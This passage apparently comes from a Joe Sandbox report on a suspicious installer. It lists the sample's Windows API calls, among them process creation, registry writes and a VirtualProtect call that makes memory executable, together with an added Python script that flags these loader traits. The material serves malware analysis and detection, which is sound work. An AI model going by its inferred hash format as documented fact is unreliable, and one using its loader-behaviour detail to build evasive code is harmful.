                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                          • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                          • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                          • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                          • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                          • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
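The entries above record behaviour only as readable call lists: one function in the image at 00400000 resolves imports at run time through LoadLibraryExW and GetProcAddress (the "dynamically determine API calls" signature in the overview), and the function at 100027E0 in the module mapped at 10000000 calls VirtualProtect on four bytes at 1000405C with flNewProtect 00000040, which is PAGE_EXECUTE_READWRITE, so the module makes part of its own mapped image writable and executable. The Python script below is an added example, not part of this report and not Joe Sandbox code. It parses entries written in this format (the three sample entries are copied from this page, with the "Associated" lines left out) and flags those two patterns. Its reconstruction of the "API ID" string is inferred from the API list / API ID pairs on this page and is an assumption, not Joe Sandbox's published algorithm; the flag names and the 1 MB same-image window are this example's own choices.

```python
"""Parse Joe Sandbox per-function API listings and flag loader-style behaviour.
Added example; not part of the report and not Joe Sandbox code."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three "APIs" entries copied from this report. Only the
# call lines and the "Offset:" (image base) line are needed here.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
• GetProcAddress.KERNEL32(00000000,?), ref: 00406689
  • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
  • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
  • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E61
• EnableWindow.USER32(00000000,00000000), ref: 00401E6C
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
Memory Dump Source
• Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
"""

CALL_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)")
OFFSET_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+)")
PAGE_EXECUTE_READWRITE = 0x40

@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # raw hex strings; "?" marks a value the sandbox could not resolve
    ref: int            # address of the call instruction
    subcall: bool       # reached through a callee rather than called directly

@dataclass
class Function:
    calls: list = field(default_factory=list)
    image_base: Optional[int] = None

def parse_report(text):
    """Split the listing into functions: each 'APIs' header starts a new one."""
    fns = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            fns.append(Function())
        elif fns and (m := CALL_RE.search(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            fns[-1].calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), bool(m["sub"])))
        elif fns and (m := OFFSET_RE.search(line)):
            fns[-1].image_base = int(m["base"], 16)
    return fns

# Inferred from the API list / API ID pairs on this page (assumption, not Joe
# Sandbox's published algorithm): drop the A/W suffix and the filler words
# Get/Set/Reg/Ex/Key, emit words seen more than once, then '$', then the
# remaining words in sorted order.
FILLER = {"Get", "Set", "Reg", "Ex", "Key"}

def api_words(name):
    if len(name) > 1 and name[-1] in "AW" and name[-2].islower():
        name = name[:-1]
    return [w for w in re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", name) if w not in FILLER]

def api_id(names):
    counts = Counter(w for n in names for w in api_words(n))
    repeated = "".join(sorted(w for w, c in counts.items() if c > 1))
    unique = "".join(sorted(w for w, c in counts.items() if c == 1))
    return f"{repeated}${unique}" if repeated else unique

def flag_function(fn):
    """Heuristics for loader behaviour visible in one function's calls (subcalls included)."""
    names = {c.name for c in fn.calls}
    flags = []
    if "GetProcAddress" in names and any(n.startswith(("LoadLibrary", "GetModuleHandle")) for n in names):
        flags.append("dynamic-api-resolution")
    for c in fn.calls:
        if c.name == "VirtualProtect" and len(c.args) >= 3 and c.args[2] != "?":
            if int(c.args[2], 16) == PAGE_EXECUTE_READWRITE:
                flags.append("rwx-protect")
            # Heuristic: a target in the same 1 MB window as the image base is
            # treated as the module patching its own mapped image (the report
            # does not state the image size).
            if fn.image_base is not None and c.args[0] != "?" \
                    and int(c.args[0], 16) >> 20 == fn.image_base >> 20:
                flags.append("patches-own-image")
    return flags

if __name__ == "__main__":
    for fn in parse_report(SAMPLE):
        print(f"{fn.calls[0].ref:08X}: {api_id(c.name for c in fn.calls)} {flag_function(fn)}")
```

Run as is, it prints one line per function with the reconstructed API ID and the flags raised; feeding it the other entries on this page reproduces their API ID strings, which is the check that the inferred rule holds for this report.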
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                          • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                          • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                          • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                          • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                          • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                          • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID:
                                                          • API String ID: 587946157-0
                                                          • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                          • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                          • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                          • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                          APIs
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                            • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                            • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                            • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                            • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                          • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                          • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
